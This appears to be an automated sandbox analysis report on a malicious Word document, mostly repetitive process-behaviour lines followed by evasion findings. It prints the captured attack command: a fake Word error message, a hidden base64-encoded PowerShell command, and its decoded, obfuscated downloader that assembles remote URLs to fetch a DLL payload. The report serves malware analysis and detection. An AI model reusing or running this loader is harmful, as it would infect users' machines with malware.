Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
